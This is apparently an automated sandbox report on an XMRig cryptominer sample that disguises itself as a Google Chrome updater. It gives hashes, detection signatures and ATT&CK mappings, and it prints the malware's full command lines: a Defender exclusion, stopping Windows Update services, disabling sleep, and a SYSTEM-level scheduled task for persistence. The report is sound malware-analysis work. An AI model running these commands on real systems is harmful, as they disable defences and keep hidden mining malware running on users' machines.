xmrig | e772862c5c554d912f0ed4972268c4390bc663401f1864a85953b65237087ad5

Analysis

max time kernel
150s
max time network
139s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
27/05/2023, 02:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

9.5MB
MD5

5422229fb73b556e34c950a237521e12
SHA1

db1dd1f3674627b28606d73e392aec464eb6dc46
SHA256

e772862c5c554d912f0ed4972268c4390bc663401f1864a85953b65237087ad5
SHA512

2160b289b906332ea696e53195a5245a992aacc61af0513ca266413b7e182ace7b173c0ed21e4dd9cc62c2354f9965dfdcb89e64d2b309e0f57f9ca720a9c99a
SSDEEP

196608:Z3ehppCu5upX7JuKUklqDSPRW6DhMuMu2gaavbOfpwku:Reh0X7Jddl7P469M5a6SX

Score

10^/10

xmrig evasion miner themida trojan

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs

description	pid	Process	procid_target
PID 912 created 1228	912	file.exe	14
PID 912 created 1228	912	file.exe	14
PID 912 created 1228	912	file.exe	14
PID 912 created 1228	912	file.exe	14
PID 912 created 1228	912	file.exe	14
PID 1900 created 1228	1900	updater.exe	14
PID 1900 created 1228	1900	updater.exe	14
PID 1900 created 1228	1900	updater.exe	14
PID 1900 created 1228	1900	updater.exe	14
PID 1900 created 1228	1900	updater.exe	14
PID 1900 created 1228	1900	updater.exe	14

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	file.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/1900-117-0x000000013F0F0000-0x000000014005A000-memory.dmp	xmrig
behavioral1/memory/1740-121-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	file.exe
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	file.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe

Executes dropped EXE 1 IoCs

pid	Process
1900	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
1368	taskeng.exe

Themida packer 21 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/912-54-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-55-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-56-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-57-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-58-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-59-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-60-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-61-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/memory/912-88-0x000000013FF10000-0x0000000140E7A000-memory.dmp	themida
behavioral1/files/0x0008000000013362-89.dat	themida
behavioral1/files/0x0008000000013362-91.dat	themida
behavioral1/memory/1900-92-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-94-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-95-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-96-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-97-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-98-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-99-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/memory/1900-100-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida
behavioral1/files/0x0008000000013362-115.dat	themida
behavioral1/memory/1900-117-0x000000013F0F0000-0x000000014005A000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
912	file.exe
1900	updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1900 set thread context of 1328	1900	updater.exe	68
PID 1900 set thread context of 1740	1900	updater.exe	69

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	file.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
268	sc.exe
1460	sc.exe
1776	sc.exe
828	sc.exe
512	sc.exe
1092	sc.exe
1976	sc.exe
1940	sc.exe
1748	sc.exe
1392	sc.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1884	schtasks.exe
588	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 207820da5190d901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
912	file.exe
912	file.exe
752	powershell.exe
912	file.exe
912	file.exe
912	file.exe
912	file.exe
912	file.exe
912	file.exe
1604	powershell.exe
912	file.exe
912	file.exe
1900	updater.exe
1900	updater.exe
2044	powershell.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
556	powershell.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
1900	updater.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe
1740	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	752	powershell.exe
Token: SeShutdownPrivilege	608	powercfg.exe
Token: SeShutdownPrivilege	2020	powercfg.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeShutdownPrivilege	1328	powercfg.exe
Token: SeShutdownPrivilege	1904	powercfg.exe
Token: SeDebugPrivilege	2044	powershell.exe
Token: SeShutdownPrivilege	1500	powercfg.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeShutdownPrivilege	1700	powercfg.exe
Token: SeShutdownPrivilege	896	powercfg.exe
Token: SeShutdownPrivilege	608	powercfg.exe
Token: SeDebugPrivilege	1900	updater.exe
Token: SeLockMemoryPrivilege	1740	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 864 wrote to memory of 1976	864	cmd.exe	32
PID 864 wrote to memory of 1976	864	cmd.exe	32
PID 864 wrote to memory of 1976	864	cmd.exe	32
PID 864 wrote to memory of 1940	864	cmd.exe	33
PID 864 wrote to memory of 1940	864	cmd.exe	33
PID 864 wrote to memory of 1940	864	cmd.exe	33
PID 864 wrote to memory of 1748	864	cmd.exe	34
PID 864 wrote to memory of 1748	864	cmd.exe	34
PID 864 wrote to memory of 1748	864	cmd.exe	34
PID 864 wrote to memory of 1460	864	cmd.exe	35
PID 864 wrote to memory of 1460	864	cmd.exe	35
PID 864 wrote to memory of 1460	864	cmd.exe	35
PID 864 wrote to memory of 1776	864	cmd.exe	36
PID 864 wrote to memory of 1776	864	cmd.exe	36
PID 864 wrote to memory of 1776	864	cmd.exe	36
PID 1656 wrote to memory of 608	1656	cmd.exe	41
PID 1656 wrote to memory of 608	1656	cmd.exe	41
PID 1656 wrote to memory of 608	1656	cmd.exe	41
PID 1656 wrote to memory of 2020	1656	cmd.exe	42
PID 1656 wrote to memory of 2020	1656	cmd.exe	42
PID 1656 wrote to memory of 2020	1656	cmd.exe	42
PID 1656 wrote to memory of 1328	1656	cmd.exe	43
PID 1656 wrote to memory of 1328	1656	cmd.exe	43
PID 1656 wrote to memory of 1328	1656	cmd.exe	43
PID 1656 wrote to memory of 1904	1656	cmd.exe	44
PID 1656 wrote to memory of 1904	1656	cmd.exe	44
PID 1656 wrote to memory of 1904	1656	cmd.exe	44
PID 1604 wrote to memory of 1884	1604	powershell.exe	45
PID 1604 wrote to memory of 1884	1604	powershell.exe	45
PID 1604 wrote to memory of 1884	1604	powershell.exe	45
PID 1368 wrote to memory of 1900	1368	taskeng.exe	49
PID 1368 wrote to memory of 1900	1368	taskeng.exe	49
PID 1368 wrote to memory of 1900	1368	taskeng.exe	49
PID 1476 wrote to memory of 828	1476	cmd.exe	54
PID 1476 wrote to memory of 828	1476	cmd.exe	54
PID 1476 wrote to memory of 828	1476	cmd.exe	54
PID 1476 wrote to memory of 512	1476	cmd.exe	55
PID 1476 wrote to memory of 512	1476	cmd.exe	55
PID 1476 wrote to memory of 512	1476	cmd.exe	55
PID 1476 wrote to memory of 1392	1476	cmd.exe	56
PID 1476 wrote to memory of 1392	1476	cmd.exe	56
PID 1476 wrote to memory of 1392	1476	cmd.exe	56
PID 1476 wrote to memory of 268	1476	cmd.exe	57
PID 1476 wrote to memory of 268	1476	cmd.exe	57
PID 1476 wrote to memory of 268	1476	cmd.exe	57
PID 1476 wrote to memory of 1092	1476	cmd.exe	58
PID 1476 wrote to memory of 1092	1476	cmd.exe	58
PID 1476 wrote to memory of 1092	1476	cmd.exe	58
PID 1976 wrote to memory of 1500	1976	cmd.exe	63
PID 1976 wrote to memory of 1500	1976	cmd.exe	63
PID 1976 wrote to memory of 1500	1976	cmd.exe	63
PID 1976 wrote to memory of 1700	1976	cmd.exe	64
PID 1976 wrote to memory of 1700	1976	cmd.exe	64
PID 1976 wrote to memory of 1700	1976	cmd.exe	64
PID 1976 wrote to memory of 896	1976	cmd.exe	65
PID 1976 wrote to memory of 896	1976	cmd.exe	65
PID 1976 wrote to memory of 896	1976	cmd.exe	65
PID 556 wrote to memory of 588	556	powershell.exe	66
PID 556 wrote to memory of 588	556	powershell.exe	66
PID 556 wrote to memory of 588	556	powershell.exe	66
PID 1976 wrote to memory of 608	1976	cmd.exe	67
PID 1976 wrote to memory of 608	1976	cmd.exe	67
PID 1976 wrote to memory of 608	1976	cmd.exe	67
PID 1900 wrote to memory of 1328	1900	updater.exe	68

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1228
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:864
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1976
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1940
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1748
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1460
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#brvhh#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1884
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:608
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2020
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1328
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2044
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:828
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:512
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1392
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:268
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1092
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1976
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1700
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:896
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#brvhh#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:588
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:1328
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1740

C:\Windows\system32\taskeng.exe
taskeng.exe {41A7EDD7-89A9-44AD-8E69-F8752166BA03} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1368
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1900

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
9.5MB

MD5
5422229fb73b556e34c950a237521e12

SHA1
db1dd1f3674627b28606d73e392aec464eb6dc46

SHA256
e772862c5c554d912f0ed4972268c4390bc663401f1864a85953b65237087ad5

SHA512
2160b289b906332ea696e53195a5245a992aacc61af0513ca266413b7e182ace7b173c0ed21e4dd9cc62c2354f9965dfdcb89e64d2b309e0f57f9ca720a9c99a

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
9.5MB

MD5
5422229fb73b556e34c950a237521e12

SHA1
db1dd1f3674627b28606d73e392aec464eb6dc46

SHA256
e772862c5c554d912f0ed4972268c4390bc663401f1864a85953b65237087ad5

SHA512
2160b289b906332ea696e53195a5245a992aacc61af0513ca266413b7e182ace7b173c0ed21e4dd9cc62c2354f9965dfdcb89e64d2b309e0f57f9ca720a9c99a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2162a30ba136c399c023820286d1ce15

SHA1
82756595aa8a4624564eba4973bfb454053e67df

SHA256
47d16ab292d760d84928c1187d06fc02d7de138d4b293df69d7498811e8c56eb

SHA512
6e3d6d466dd35f118a0ed5306bd06d57d45277e9f17116a91c4627212ab5cb8e8efed7e72f7d15faa610cdcfad59d364c3e1e7d89179f22fe438124fe5216f7a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LIHOJ23CLT5KVO233R0J.temp

Filesize
7KB

MD5
2162a30ba136c399c023820286d1ce15

SHA1
82756595aa8a4624564eba4973bfb454053e67df

SHA256
47d16ab292d760d84928c1187d06fc02d7de138d4b293df69d7498811e8c56eb

SHA512
6e3d6d466dd35f118a0ed5306bd06d57d45277e9f17116a91c4627212ab5cb8e8efed7e72f7d15faa610cdcfad59d364c3e1e7d89179f22fe438124fe5216f7a

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
3e9af076957c5b2f9c9ce5ec994bea05

SHA1
a8c7326f6bceffaeed1c2bb8d7165e56497965fe

SHA256
e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

SHA512
933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
9.5MB

MD5
5422229fb73b556e34c950a237521e12

SHA1
db1dd1f3674627b28606d73e392aec464eb6dc46

SHA256
e772862c5c554d912f0ed4972268c4390bc663401f1864a85953b65237087ad5

SHA512
2160b289b906332ea696e53195a5245a992aacc61af0513ca266413b7e182ace7b173c0ed21e4dd9cc62c2354f9965dfdcb89e64d2b309e0f57f9ca720a9c99a

Download Submit
memory/556-112-0x00000000012BB000-0x00000000012F2000-memory.dmp

Filesize
220KB

Download
memory/556-111-0x00000000012B4000-0x00000000012B7000-memory.dmp

Filesize
12KB

Download
memory/752-74-0x000000000256B000-0x00000000025A2000-memory.dmp

Filesize
220KB

Download
memory/752-71-0x000000001B0B0000-0x000000001B392000-memory.dmp

Filesize
2.9MB

Download
memory/752-73-0x0000000002564000-0x0000000002567000-memory.dmp

Filesize
12KB

Download
memory/752-72-0x0000000002260000-0x0000000002268000-memory.dmp

Filesize
32KB

Download
memory/912-58-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-61-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-57-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-56-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-55-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-88-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-60-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-59-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/912-54-0x000000013FF10000-0x0000000140E7A000-memory.dmp

Filesize
15.4MB

Download
memory/1328-120-0x0000000140000000-0x000000014002A000-memory.dmp

Filesize
168KB

Download
memory/1368-101-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1368-93-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1604-82-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/1604-86-0x000000000272B000-0x0000000002762000-memory.dmp

Filesize
220KB

Download
memory/1604-85-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1604-84-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1604-83-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1604-81-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/1740-121-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/1740-119-0x0000000000530000-0x0000000000550000-memory.dmp

Filesize
128KB

Download
memory/1740-118-0x0000000000200000-0x0000000000220000-memory.dmp

Filesize
128KB

Download
memory/1900-94-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-100-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-99-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-98-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-97-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-117-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-96-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-95-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/1900-92-0x000000013F0F0000-0x000000014005A000-memory.dmp

Filesize
15.4MB

Download
memory/2044-108-0x00000000011DB000-0x0000000001212000-memory.dmp

Filesize
220KB

Download
memory/2044-107-0x00000000011D4000-0x00000000011D7000-memory.dmp

Filesize
12KB

Download